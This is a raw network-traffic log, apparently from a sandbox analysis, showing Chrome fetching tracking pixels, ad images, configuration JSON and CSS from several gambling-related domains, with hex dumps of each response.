                                                                                                                                                          2024-06-09 22:40:51 UTC551OUTGET /cc.png?r=8877277658 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:52 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6722633018988080304
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:52 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          116192.168.2.549857103.117.134.214434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC614OUTGET /zb-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&terminal=1&r=6412591773 HTTP/1.1
                                                                                                                                                          Host: ocsapi-lc.tingmeikj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://hg679.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:53 UTC23INData Raw: 53 65 72 76 65 72 3a 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 30 0d 0a
                                                                                                                                                          Data Ascii: Server: Tengine/2.3.0
                                                                                                                                                          2024-06-09 22:40:53 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 30 3a 35 32 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          2024-06-09 22:40:53 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/plain;charset=utf-8
                                                                                                                                                          2024-06-09 22:40:53 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:53 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:53 UTC16INData Raw: 61 70 69 2d 65 6c 61 70 73 65 64 3a 20 36 0d 0a
                                                                                                                                                          Data Ascii: api-elapsed: 6
                                                                                                                                                          2024-06-09 22:40:53 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Vary: Accept-Encoding
                                                                                                                                                          2024-06-09 22:40:53 UTC34INData Raw: 78 2d 73 65 72 76 65 72 3a 20 41 6b 61 6d 61 69 4e 65 74 53 74 6f 72 61 67 65 28 6a 70 31 36 29 0d 0a
                                                                                                                                                          Data Ascii: x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          2024-06-09 22:40:53 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:53 UTC82INData Raw: 58 2d 56 69 61 3a 20 31 2e 31 20 61 77 73 3a 6a 70 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 2c 20 31 2e 31 20 6f 63 73 61 70 69 3a 30 30 20 28 43 64 6e 20 43 61 63 68 65 20 53 65 72 76 65 72 20 56 32 2e 30 29 0d 0a
                                                                                                                                                          Data Ascii: X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          117192.168.2.54984938.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC378OUTGET /ftl/commonPage/zh_CN/pubads/images/ads1.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:52 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:52 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:52 UTC23INData Raw: 45 54 61 67 3a 20 22 35 64 38 34 38 66 34 66 2d 32 65 37 35 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5d848f4f-2e75"
                                                                                                                                                          2024-06-09 22:40:52 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:52 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:40:52 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 30 20 53 65 70 20 32 30 31 39 20 30 38 3a 33 35 3a 32 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          2024-06-09 22:40:52 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:52 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:52 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:52 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:40:52 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          118192.168.2.54985138.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC378OUTGET /ftl/commonPage/zh_CN/pubads/images/ads2.png HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:53 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:40:53 UTC23INData Raw: 45 54 61 67 3a 20 22 35 64 38 34 38 66 34 66 2d 34 62 62 63 22 0d 0a
                                                                                                                                                          Data Ascii: ETag: "5d848f4f-4bbc"
                                                                                                                                                          2024-06-09 22:40:53 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:53 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: image/png
                                                                                                                                                          2024-06-09 22:40:53 UTC46INData Raw: 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 46 72 69 2c 20 32 30 20 53 65 70 20 32 30 31 39 20 30 38 3a 33 35 3a 32 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          2024-06-09 22:40:53 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:53 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                                                                                                                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                                                                                                                                          2024-06-09 22:40:53 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 30 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 32 33 3a 35 37 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Expires: Mon, 10 Jun 2024 22:23:57 GMT
                                                                                                                                                          2024-06-09 22:40:53 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: max-age=86400
                                                                                                                                                          2024-06-09 22:40:53 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                                                                                                                                          Data Ascii: X-Cache: HIT


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          119192.168.2.549858163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC651OUTGET /lt-cloud/stat.do?pv=ajax&pa=host.info&domain=xpj723.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972850573425 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://xpj723.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC548INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:53 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          api-elapsed: 26
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          x-server: AkamaiNetStorage(jp16)
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache29.l2hk3[59,0], cache16.l2sg3[92,0], ens-cache8.de5[259,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9c17179728529021249e
                                                                                                                                                          2024-06-09 22:40:53 UTC1158INData Raw: 34 37 66 0d 0a 7b 22 61 6e 61 6c 79 74 69 63 73 43 6f 64 65 22 3a 22 28 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 2c 20 64 2c 20 65 2c 20 6a 2c 20 73 29 20 7b 20 20 20 20 20 20 20 20 20 61 5b 64 5d 20 3d 20 61 5b 64 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 20 20 20 20 20 20 20 20 20 20 20 20 28 61 5b 64 5d 2e 61 20 3d 20 61 5b 64 5d 2e 61 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 20 20 20 20 20 20 20 20 20 7d 3b 20 20 20 20 20 20 20 20 20 6a 20 3d 20 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 29 2c 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 63 29 5b 30 5d 3b 20 20 20 20 20 20 20 20 20 6a 2e 61 73 79 6e 63 20 3d 20 74 72 75 65
                                                                                                                                                          Data Ascii: 47f{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true
                                                                                                                                                          2024-06-09 22:40:53 UTC1601INData Raw: 36 33 61 0d 0a 6e 49 64 52 75 6c 65 54 79 70 65 22 3a 22 31 2c 32 2c 33 22 2c 22 6c 6f 67 69 6e 41 74 74 65 6d 70 74 41 6e 64 42 6c 6f 63 6b 22 3a 22 31 30 2c 33 30 22 2c 22 75 73 64 74 57 61 6c 6c 65 74 46 6c 61 67 22 3a 30 2c 22 63 68 61 72 67 65 4d 65 6d 6f 52 65 71 75 69 72 65 22 3a 31 2c 22 74 72 61 6e 73 66 65 72 49 6e 54 68 72 65 73 68 6f 6c 64 22 3a 30 2c 22 77 69 74 68 64 72 61 77 52 65 71 75 69 72 65 4d 6f 62 69 6c 65 22 3a 30 2c 22 6c 69 6d 69 74 54 69 6d 65 22 3a 22 33 30 22 2c 22 6e 61 6d 65 46 6f 72 63 65 43 68 65 63 6b 22 3a 30 2c 22 64 65 66 61 75 6c 74 41 67 65 6e 74 43 6f 64 65 46 6c 61 67 22 3a 30 2c 22 61 70 70 46 62 4c 6f 67 69 6e 46 6c 61 67 22 3a 30 2c 22 68 6f 74 4c 6f 74 74 65 72 79 4e 75 6d 73 22 3a 22 22 2c 22 73 75 62 54 72 61
                                                                                                                                                          Data Ascii: 63anIdRuleType":"1,2,3","loginAttemptAndBlock":"10,30","usdtWalletFlag":0,"chargeMemoRequire":1,"transferInThreshold":0,"withdrawRequireMobile":0,"limitTime":"30","nameForceCheck":0,"defaultAgentCodeFlag":0,"appFbLoginFlag":0,"hotLotteryNums":"","subTra
                                                                                                                                                          2024-06-09 22:40:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          120192.168.2.549861163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC369OUTGET /ocs/cc.png?1717972848771 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC419INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:53 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache37.l2hk3[7,0], cache7.l2sg3[40,0], ens-cache12.de5[204,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55ca017179728529247233e
                                                                                                                                                          2024-06-09 22:40:53 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          121192.168.2.54986290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:52 UTC555OUTGET /pc/240516-03/static/css/t4091.css HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:53 UTC635INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:52 GMT
                                                                                                                                                          Content-Type: text/css
                                                                                                                                                          Content-Length: 477224
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:37 GMT
                                                                                                                                                          ETag: "6645ca45-74828"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[26],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,24],EU-GER-frankfurt-GLOBAL1-CACHE8[816],EU-GER-frankfurt-GLOBAL1-CACHE12[539,TCP_MISS,807],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 75f24d4c027ce8dfebffafcc1c04605f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1356621
                                                                                                                                                          X-CCDN-Expires: 1235380
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:53 UTC15749INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 31 62 31 35 20 75 72 6c 28 2f 70 63 2f 69 6d 61 67 65 2d 70 63 2f 74 75 74 6f 72 69 61 6c 2f 62 69 67 2d 62 67 2e 6a 70 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 62 6f 74 74 6f 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d 76 2d 65 39 37 35 37 39 38 38 5d 3a 61 66 74 65 72 2c 2e 74 75 74 6f 72 69 61 6c 2d 62 6f 64 79 20 5b 64 61 74 61 2d
                                                                                                                                                          Data Ascii: @charset "UTF-8";.tutorial-body[data-v-e9757988]{min-width:1000px;background:#201b15 url(/pc/image-pc/tutorial/big-bg.jpg) no-repeat bottom;background-size:cover}.tutorial-body [data-v-e9757988],.tutorial-body [data-v-e9757988]:after,.tutorial-body [data-
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 61 63 2d 2d 77 72 61 70 70 65 72 20 2e 61 63 74 69 76 69 74 79 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 2d 77 72 61 70 70 65 72 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 33 73 7d 23 61 63 2d 2d 77 72 61 70 70 65 72 20 2e 61 63 74 69 76 69 74 79 5f 63 6f 6e 74 61 69 6e 65 72 20 2e 64 72 6f 70 2d 64 6f 77 6e 2d 6d 65 6e 75 20 2e 6d 65 6e 75 2d 77 72 61 70 70 65 72 20 2e 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b
                                                                                                                                                          Data Ascii: ac--wrapper .activity_container .drop-down-menu .menu-wrapper .grid-wrapper{width:100%;display:-ms-flexbox;display:flex;position:absolute;top:0;left:0;transition:.3s}#ac--wrapper .activity_container .drop-down-menu .menu-wrapper .grid{display:-ms-flexbox;
                                                                                                                                                          2024-06-09 22:40:53 UTC16384INData Raw: 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 37 36 36 36 37 73 20 6c 69 6e 65 61 72 20 31 7d 2e 68 62 73 64 2d 32 34 5b 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 5d 7b 74 6f 70 3a 31 30 30 25 3b 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20 31 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 48 6f 6e 67 62 61 6f 52 61 69 6e 2d 64 61 74 61 2d 76 2d 35 38 33 65 34 64 65 36 20 2e 38 73 20 6c 69 6e 65 61 72 20
